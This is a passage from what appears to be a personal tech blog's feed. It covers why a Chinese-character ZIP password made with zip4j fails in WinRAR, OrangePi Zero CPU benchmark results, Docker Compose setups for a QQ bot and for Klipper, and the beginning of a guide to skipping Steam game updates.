class="type">long</span> lastModifiedFileTime, <span class="type">long</span> crc,</span></span><br><span class="line"><span class="params"> <span class="type">boolean</span> useUtf8ForPassword)</span> <span class="keyword">throws</span> ZipException {</span><br><span class="line"> <span class="keyword">if</span> (password == <span class="literal">null</span> || password.length <= <span class="number">0</span>) {</span><br><span class="line">
<span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">ZipException</span>(<span class="string">"Wrong password!"</span>, ZipException.Type.WRONG_PASSWORD);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> zipCryptoEngine.initKeys(password, useUtf8ForPassword);</span><br></pre></td></tr></table></figure><p>Further: </p><figure class="highlight java"><figcaption><span>src/main/java/net/lingala/zip4j/crypto/engine/ZipCryptoEngine.java</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">initKeys</span><span class="params">(<span class="type">char</span>[] password, <span class="type">boolean</span> useUtf8ForPassword)</span> {</span><br><span class="line"> keys[<span class="number">0</span>] = <span class="number">305419896</span>;</span><br><span class="line"> keys[<span class="number">1</span>] = <span class="number">591751049</span>;</span><br><span class="line"> keys[<span class="number">2</span>] = <span class="number">878082192</span>;</span><br><span class="line"> <span class="type">byte</span>[] bytes = convertCharArrayToByteArray(password, useUtf8ForPassword);</span><br><span class="line"> <span class="keyword">for</span> (<span class="type">byte</span> b : bytes) {</span><br><span class="line"> updateKeys((<span class="type">byte</span>) (b & <span class="number">0xff</span>));</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Here it is: </p><figure class="highlight
java"><figcaption><span>src/main/java/net/lingala/zip4j/util/Zip4jUtil.java</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] convertCharArrayToByteArray(<span class="type">char</span>[] charArray, <span class="type">boolean</span> useUtf8Charset) {</span><br><span class="line"> <span class="keyword">return</span> useUtf8Charset</span><br><span class="line"> ? convertCharArrayToByteArrayUsingUtf8(charArray)</span><br><span class="line"> : convertCharArrayToByteArrayUsingDefaultCharset(charArray);</span><br><span class="line">}</span><br><span class="line">......</span><br><span class="line"></span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> <span class="type">byte</span>[] convertCharArrayToByteArrayUsingDefaultCharset(<span class="type">char</span>[] charArray) {</span><br><span class="line"> <span class="type">byte</span>[] bytes = <span class="keyword">new</span> <span class="title class_">byte</span>[charArray.length];</span><br><span class="line"> <span class="keyword">for</span> (<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i < charArray.length; i++) {</span><br><span class="line"> bytes[i] = (<span class="type">byte</span>) charArray[i];</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> 
bytes;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>We copy this code out, find a snippet that converts the output to hex, combine the two, and run it to see: </p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">UnZip</span> {</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Throwable {</span><br><span class="line">        <span class="type">String</span> <span class="variable">password</span> <span class="operator">=</span> <span class="string">"克拉拉"</span>;</span><br><span class="line"></span><br><span class="line">        System.out.println(password.toCharArray());</span><br><span class="line"></span><br><span class="line">        <span class="type">byte</span>[] encbytes = <span class="keyword">new</span> <span class="title class_">byte</span>[password.toCharArray().length];</span><br><span class="line">        <span class="keyword">for</span> (<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i < password.toCharArray().length; i++) {</span><br><span class="line">            encbytes[i] = (<span class="type">byte</span>) password.toCharArray()[i];</span><br><span class="line">        }</span><br><span class="line"></span><br><span class="line">        System.out.println(bytesToHex(encbytes));</span><br><span class="line"></span><br><span class="line">    }</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">char</span>[] HEX_ARRAY = <span class="string">"0123456789ABCDEF"</span>.toCharArray();</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> String <span class="title function_">bytesToHex</span><span class="params">(<span class="type">byte</span>[] bytes)</span> {</span><br><span class="line">        <span class="type">char</span>[] hexChars = <span class="keyword">new</span> <span class="title class_">char</span>[bytes.length * <span class="number">2</span>];</span><br><span class="line">        <span class="keyword">for</span> (<span class="type">int</span> <span class="variable">j</span> <span class="operator">=</span> <span class="number">0</span>; j < bytes.length; j++) {</span><br><span class="line">            <span class="type">int</span> <span class="variable">v</span> <span class="operator">=</span> bytes[j] & <span class="number">0xFF</span>;</span><br><span class="line">            hexChars[j * <span class="number">2</span>] = HEX_ARRAY[v >>> <span class="number">4</span>];</span><br><span class="line">            hexChars[j * <span class="number">2</span> + <span class="number">1</span>] = HEX_ARRAY[v & <span class="number">0x0F</span>];</span><br><span class="line">        }</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">new</span> <span class="title class_">String</span>(hexChars);</span><br><span class="line">    }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Output: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">克拉拉</span><br><span class="line">4BC9C9</span><br></pre></td></tr></table></figure><p>OK, so what is this <code>4B C9 C9</code>? It is the low byte of each UTF-16 code unit of the password (U+514B, U+62C9, U+62C9), because the <code>(byte)</code> cast discards the high byte of every character.<br>We open WinHex and type it straight in to see:<br><img src="/pictures/chinese-zip-password/8.png"><br>Good, now copy and paste it into WinRAR:<br><img src="/pictures/chinese-zip-password/9.png"><br><img src="/pictures/chinese-zip-password/10.png"> </p><p>Done. Another day of picking up odd knowledge.</p>]]></content>
<summary type="html"><h3 id="起因"><a href="#起因" class="headerlink" title="起因"></a>How it started</h3><p><strong>One day, a friend forwarded me a password-protected Zip archive over QQ</strong><br><img src="/pictures/chinese-zip-password/1.png"></p>
<p>I took a look, double-clicked it so that it opened in WinRAR by default, then copied and pasted the password:<br><img src="/pictures/chinese-zip-password/2.png"></p>
<p>Huh? Wrong password?</p>
<hr></summary>
<category term="折腾那些事" scheme="https://thinkalone.win/categories/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>OrangePi Zero CPU Benchmark</title>
<link href="https://thinkalone.win/OrangePiZero-CPU-Benchmark.html"/>
<id>https://thinkalone.win/OrangePiZero-CPU-Benchmark.html</id>
<published>2023-12-01T04:00:00.000Z</published>
<updated>2025-03-01T04:00:00.000Z</updated>
<content type="html"><![CDATA[<p>CPU: H2+<br>RAM: 512M </p><p>(Retested in 2025/03) </p><p>screenfetch </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> _,met$$$$$gg. disappear9@OPi-Zero</span><br><span class="line"> ,g$$$$$$$$$$$$$$$P. OS: Debian 12 bookworm</span><br><span class="line"> ,g$$P"" """Y$$.". Kernel: armv7l Linux 6.6.75-current-sunxi</span><br><span class="line"> ,$$P' `$$$. Uptime: 1h 41m</span><br><span class="line">',$$P ,ggs. `$$b: Packages: 437</span><br><span class="line">`d$$' ,$P"' . $$$ Shell: bash</span><br><span class="line"> $$P d$' , $$P Disk: 3.8G / 30G (14%)</span><br><span class="line"> $$: $$. - ,d$$' CPU: ARMv7 rev 5 (v7l) @ 4x 1.296GHz</span><br><span class="line"> $$\; Y$b._ _,d$P' GPU:</span><br><span class="line"> Y$$.
`.`"Y$$$$P"' RAM: -</span><br><span class="line"> `$$b "-.__</span><br><span class="line"> `Y$$</span><br><span class="line"> `Y$$.</span><br><span class="line"> `$$b.</span><br><span class="line"> `Y$$b.</span><br><span class="line"> `"Y$b._</span><br><span class="line"> `""""</span><br><span class="line"></span><br></pre></td></tr></table></figure><span id="more"></span><p>7-zip 16.02:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">disappear9@OPi-Zero:~$ 7z b -mmt4</span><br><span class="line"></span><br><span 
class="line">7-Zip [32] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21</span><br><span class="line">p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,32 bits,4 CPUs LE)</span><br><span class="line"></span><br><span class="line">LE</span><br><span class="line">CPU Freq: 32000000 - - - - - - - -</span><br><span class="line"></span><br><span class="line">RAM size: 489 MB, # CPU hardware threads: 4</span><br><span class="line">RAM usage: 450 MB, # Benchmark threads: 4</span><br><span class="line"></span><br><span class="line"> Compressing | Decompressing</span><br><span class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 1513 347 424 1472 | 44851 396 966 3827</span><br><span class="line">23: 1431 356 410 1459 | 41115 396 899 3557</span><br><span class="line">24: 1305 355 396 1403 | 37626 396 834 3303</span><br><span class="line">---------------------------------- | ------------------------------</span><br><span class="line">Avr: 353 410 1445 | 396 900 3562</span><br><span class="line">Tot: 374 655 2504</span><br><span class="line">disappear9@OPi-Zero:~$ 7z b -mmt1</span><br><span class="line"></span><br><span class="line">7-Zip [32] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21</span><br><span class="line">p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,32 bits,4 CPUs LE)</span><br><span class="line"></span><br><span class="line">LE</span><br><span class="line">CPU Freq: 64000000 64000000 64000000 - - - - - -</span><br><span class="line"></span><br><span class="line">RAM size: 489 MB, # CPU hardware threads: 4</span><br><span class="line">RAM usage: 435 MB, # Benchmark threads: 1</span><br><span class="line"></span><br><span class="line"> Compressing | Decompressing</span><br><span class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> 
KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 573 100 558 558 | 11927 100 1019 1018</span><br><span class="line">23: 539 100 550 550 | 11765 100 1019 1018</span><br><span class="line">24: 518 100 557 557 | 11506 100 1010 1010</span><br><span class="line">25: 491 100 562 561 | 11200 100 997 997</span><br><span class="line">---------------------------------- | ------------------------------</span><br><span class="line">Avr: 100 557 557 | 100 1011 1011</span><br><span class="line">Tot: 100 784 784</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>sysbench </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span 
class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">disappear9@OPi-Zero:~$ sysbench cpu --cpu-max-prime=20000 --threads=4 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 4</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 74.41</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0407s</span><br><span class="line"> total number of events: 748</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 53.14</span><br><span class="line"> avg: 53.62</span><br><span class="line"> max: 
107.58</span><br><span class="line"> 95th percentile: 52.89</span><br><span class="line"> sum: 40104.21</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> events (avg/stddev): 187.0000/0.00</span><br><span class="line"> execution time (avg/stddev): 10.0261/0.01</span><br><span class="line"></span><br><span class="line">disappear9@OPi-Zero:~$ sysbench cpu --cpu-max-prime=20000 --threads=1 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 1</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 18.59</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0466s</span><br><span class="line"> total number of events: 187</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 53.17</span><br><span class="line"> avg: 53.71</span><br><span class="line"> max: 106.98</span><br><span class="line"> 95th percentile: 52.89</span><br><span class="line"> sum: 10044.25</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> events (avg/stddev): 187.0000/0.00</span><br><span class="line"> execution time (avg/stddev): 10.0442/0.00</span><br><span class="line"></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><p>CPU:H2+<br>RAM:512M </p>
<p>(Retested in 2025&#x2F;03) </p>
<p>screenfetch </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> _,met$$$$$gg. disappear9@OPi-Zero</span><br><span class="line"> ,g$$$$$$$$$$$$$$$P. OS: Debian 12 bookworm</span><br><span class="line"> ,g$$P&quot;&quot; &quot;&quot;&quot;Y$$.&quot;. Kernel: armv7l Linux 6.6.75-current-sunxi</span><br><span class="line"> ,$$P&#x27; `$$$. Uptime: 1h 41m</span><br><span class="line">&#x27;,$$P ,ggs. `$$b: Packages: 437</span><br><span class="line">`d$$&#x27; ,$P&quot;&#x27; . $$$ Shell: bash</span><br><span class="line"> $$P d$&#x27; , $$P Disk: 3.8G / 30G (14%)</span><br><span class="line"> $$: $$. - ,d$$&#x27; CPU: ARMv7 rev 5 (v7l) @ 4x 1.296GHz</span><br><span class="line"> $$\; Y$b._ _,d$P&#x27; GPU:</span><br><span class="line"> Y$$. `.`&quot;Y$$$$P&quot;&#x27; RAM: -</span><br><span class="line"> `$$b &quot;-.__</span><br><span class="line"> `Y$$</span><br><span class="line"> `Y$$.</span><br><span class="line"> `$$b.</span><br><span class="line"> `Y$$b.</span><br><span class="line"> `&quot;Y$b._</span><br><span class="line"> `&quot;&quot;&quot;&quot;</span><br><span class="line"></span><br></pre></td></tr></table></figure></summary>
<category term="测试结果" scheme="https://thinkalone.win/categories/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
<category term="杂项" scheme="https://thinkalone.win/tags/%E6%9D%82%E9%A1%B9/"/>
<category term="测试结果" scheme="https://thinkalone.win/tags/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
</entry>
<entry>
<title>Deploying zhenxun_bot (绪山真寻Bot) with Docker</title>
<link href="https://thinkalone.win/zx_bot_Docker.html"/>
<id>https://thinkalone.win/zx_bot_Docker.html</id>
<published>2023-01-10T04:00:00.000Z</published>
<updated>2023-01-10T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h1 id="指路"><a href="#指路" class="headerlink" title="指路"></a>Links</h1><p><a href="https://github.com/D9Lab/zhenxun_bot_docker"><img src="https://shields.io/badge/GITHUB-D9Lab/zhenxun_bot_docker-4476AF?logo=github&style=for-the-badge" alt="Github"></a></p><p><a href="https://github.com/HibiKier/zhenxun_bot"><img src="https://shields.io/badge/GITHUB-HibiKier/zhenxun_bot-4476AF?logo=github&style=for-the-badge" alt="Github"></a></p><h1 id="使用Portainer建立Stacks"><a href="#使用Portainer建立Stacks" class="headerlink" title="使用Portainer建立Stacks"></a>Creating Stacks with Portainer</h1><p>Open Stacks, click Add stack, and paste the following code:</p><figure class="highlight yaml"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line"><span class="attr">version:</span> <span class="string">'3.4'</span></span><br><span class="line"></span><br><span class="line"><span class="attr">services:</span></span><br><span class="line">  <span class="attr">go-cqhttp:</span></span><br><span class="line">    <span class="attr">image:</span> <span class="string">silicer/go-cqhttp:latest</span></span><br><span class="line">    <span class="attr">container_name:</span> <span class="string">zxbot_go-cqhttp</span></span><br><span class="line">    <span class="attr">restart:</span> <span class="string">unless-stopped</span></span><br><span class="line">    <span class="attr">volumes:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">go-cqhttp_data:/data</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">bot_data:/bot</span></span><br><span class="line">    <span class="attr">links:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">bot:bot</span> <span class="comment">#configure as ws reverse, address ws://bot:8080/onebot/v11/ws</span></span><br><span class="line"></span><br><span 
class="line">  <span class="attr">postgres:</span></span><br><span class="line">    <span class="attr">image:</span> <span class="string">postgres:14</span></span><br><span class="line">    <span class="attr">container_name:</span> <span class="string">zxbot_postgres</span></span><br><span class="line">    <span class="attr">restart:</span> <span class="string">unless-stopped</span></span><br><span class="line">    <span class="attr">environment:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">POSTGRES_USER=zxbot</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">POSTGRES_PASSWORD=zxbot</span> <span class="comment">#example credentials; change here and in DB below</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">POSTGRES_DB=zxbot_database</span></span><br><span class="line">    <span class="attr">volumes:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">postgres_data:/var/lib/postgresql/data</span></span><br><span class="line"></span><br><span class="line">  <span class="attr">bot:</span> <span class="comment">#the listen address in .env.dev must be changed to 0.0.0.0</span></span><br><span class="line">    <span class="attr">image:</span> <span class="string">ghcr.io/d9lab/zhenxun_bot:latest</span> <span class="comment">#ghcr.io</span></span><br><span class="line">    <span class="comment">#image: d9lab01/zhenxun_bot #DockerHub</span></span><br><span class="line">    <span class="attr">container_name:</span> <span class="string">zxbot_zhenxun_bot</span></span><br><span class="line">    <span class="attr">depends_on:</span> </span><br><span class="line">      <span class="bullet">-</span> <span class="string">postgres</span></span><br><span class="line">    <span class="attr">restart:</span> <span class="string">unless-stopped</span></span><br><span class="line">    <span class="attr">environment:</span></span><br><span 
class="line">      <span class="bullet">-</span> <span class="string">SU=114514</span> <span class="comment">#admin QQ number</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">DB=postgres://zxbot:zxbot@postgres:5432/zxbot_database</span></span><br><span class="line">    <span class="attr">volumes:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">bot_data:/bot</span></span><br><span class="line">    <span class="attr">links:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">postgres:postgres</span></span><br><span class="line"></span><br><span class="line"><span class="attr">volumes:</span> </span><br><span class="line">  <span class="attr">bot_data:</span></span><br><span class="line">  <span class="attr">go-cqhttp_data:</span></span><br><span class="line">  <span class="attr">postgres_data:</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>If there is a problem with the image, open an issue; I will reply when I see it.</p>]]></content>
<summary type="html"><h1 id="指路"><a href="#指路" class="headerlink" title="指路"></a>Links</h1><p><a href="https://github.com/D9Lab/zhenxun_bot_docker"><img src="https:</summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>Running Klipper in Docker</title>
<link href="https://thinkalone.win/klipper-docker.html"/>
<id>https://thinkalone.win/klipper-docker.html</id>
<published>2022-01-25T04:00:00.000Z</published>
<updated>2022-01-25T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h1 id="安装Portainer"><a href="#安装Portainer" class="headerlink" title="安装Portainer"></a>Installing Portainer</h1><p><a href="https://docs.portainer.io/v/ce-2.11/start/install">https://docs.portainer.io/v/ce-2.11/start/install</a></p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">docker volume create portainer_data</span><br><span class="line">docker run -d -p 9443:9443 --name portainer \</span><br><span class="line">--restart=always \</span><br><span class="line">-v /var/run/docker.sock:/var/run/docker.sock \</span><br><span class="line">-v portainer_data:/data \</span><br><span class="line">portainer/portainer-ce:lts</span><br></pre></td></tr></table></figure><h1 id="建立Stacks(docker-compose)"><a href="#建立Stacks(docker-compose)" class="headerlink" title="建立Stacks(docker-compose)"></a>Creating Stacks (docker-compose)</h1><p><a href="https://github.com/dimalo/klipper-web-control-docker">https://github.com/dimalo/klipper-web-control-docker</a></p><p>Open Stacks, click Add stack, and paste the following code:</p><figure class="highlight yaml"><table><tr><td class="code"><pre><span class="line"><span class="attr">version:</span> <span class="string">'3.4'</span></span><br><span class="line"></span><br><span class="line"><span class="attr">services:</span></span><br><span class="line">  <span class="attr">klipper:</span></span><br><span class="line">    <span class="attr">image:</span> <span class="string">dimalo/klipper-moonraker</span></span><br><span class="line">    <span class="attr">container_name:</span> <span class="string">klipper</span></span><br><span class="line">    <span class="attr">ports:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="number">7125</span><span class="string">:7125</span></span><br><span class="line">    <span class="attr">restart:</span> <span class="string">unless-stopped</span></span><br><span class="line">    <span 
class="attr">volumes:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">gcode_files:/home/klippy/gcode_files</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">klipper_data:/home/klippy/.config</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">moonraker_data:/home/klippy/.moonraker</span></span><br><span class="line">    <span class="attr">devices:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">/dev/serial/by-id/usb-1a86_USB_Serial-if00-port0:/dev/ttyUSB0</span> <span class="comment">#change to match your setup</span></span><br><span class="line"></span><br><span class="line">  <span class="attr">fluidd:</span></span><br><span class="line">    <span class="attr">image:</span> <span class="string">dimalo/fluidd</span></span><br><span class="line">    <span class="attr">restart:</span> <span class="string">unless-stopped</span></span><br><span class="line">    <span class="attr">container_name:</span> <span class="string">fluidd</span></span><br><span class="line">    <span class="attr">ports:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="number">8010</span><span class="string">:80</span></span><br><span class="line">    <span class="attr">depends_on:</span> </span><br><span class="line">      <span class="bullet">-</span> <span class="string">klipper</span></span><br><span class="line">    <span class="attr">links:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="string">klipper:klipper</span></span><br><span class="line"></span><br><span class="line"><span class="attr">volumes:</span> </span><br><span class="line">  <span class="attr">gcode_files:</span></span><br><span class="line">  <span class="attr">moonraker_data:</span></span><br><span class="line">  <span class="attr">klipper_data:</span></span><br></pre></td></tr></table></figure><p>Visit 
<code>http://{IP}:8010</code> to see fluidd.</p><h1 id="常见问题"><a href="#常见问题" class="headerlink" title="常见问题"></a>Common problems</h1><p><code>1. fluidd shows that it cannot connect...</code></p><p>This image checks for updates at startup. The logs of the <code>klipper</code> container show that startup is stuck on git pull; wait a while or sort it out yourself.</p><p><code>2. Klipper cannot be restarted from the web page</code></p><p>Restart the corresponding container directly instead.</p><p><code>3. Uploaded file names may be in Chinese, but they must be changed to English when printing</code></p>]]></content>
<summary type="html"><h1 id="安装Portainer"><a href="#安装Portainer" class="headerlink" title="安装Portainer"></a>Installing Portainer</h1><p><a href="https://docs.portainer.io</summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>How to gracefully skip/block Steam from updating your game</title>
<link href="https://thinkalone.win/skip-steam-update.html"/>
<id>https://thinkalone.win/skip-steam-update.html</id>
<published>2021-01-22T13:00:00.000Z</published>
<updated>2021-01-22T13:00:00.000Z</updated>
<content type="html"><![CDATA[<p><img src="/pictures/skip-steam-update/head.png" alt="head"></p><p>I bought Beatsaber, and every time Steam updates the game the plugins I installed stop working, yet without updating, the game cannot be launched...</p><span id="more"></span><h2 id="1-关闭自动更新"><a href="#1-关闭自动更新" class="headerlink" title="1.关闭自动更新"></a>1. Turn off automatic updates</h2><p>This should go without saying: it keeps Steam from updating the game before you get to it.</p><pre><code>In Steam: game -> right-click Properties -> Updates -> Automatic updates -> Only update this game when I launch it</code></pre><h2 id="2-找到游戏对应的acf文件"><a href="#2-找到游戏对应的acf文件" class="headerlink" title="2.找到游戏对应的acf文件"></a>2. Find the game's acf file</h2><p>Find your game in the Steam store and copy the string of digits after <code>/app/</code> in the URL; this is the game's <code>appid</code>.</p><p><img src="/pictures/skip-steam-update/findfile.png" alt="findfile"></p><p>Search for the <code>appid</code> directly in your file manager and find the file with the acf extension. Taking Beatsaber, the game I want to modify, as an example:</p><p>Then open the acf file in your favourite text editor.</p><h2 id="3-在Steamdb找数据"><a href="#3-在Steamdb找数据" class="headerlink" title="3.在Steamdb找数据"></a>3. Look up the data on Steamdb</h2><p>Open <a href="https://steamdb.info/">Steamdb</a> and 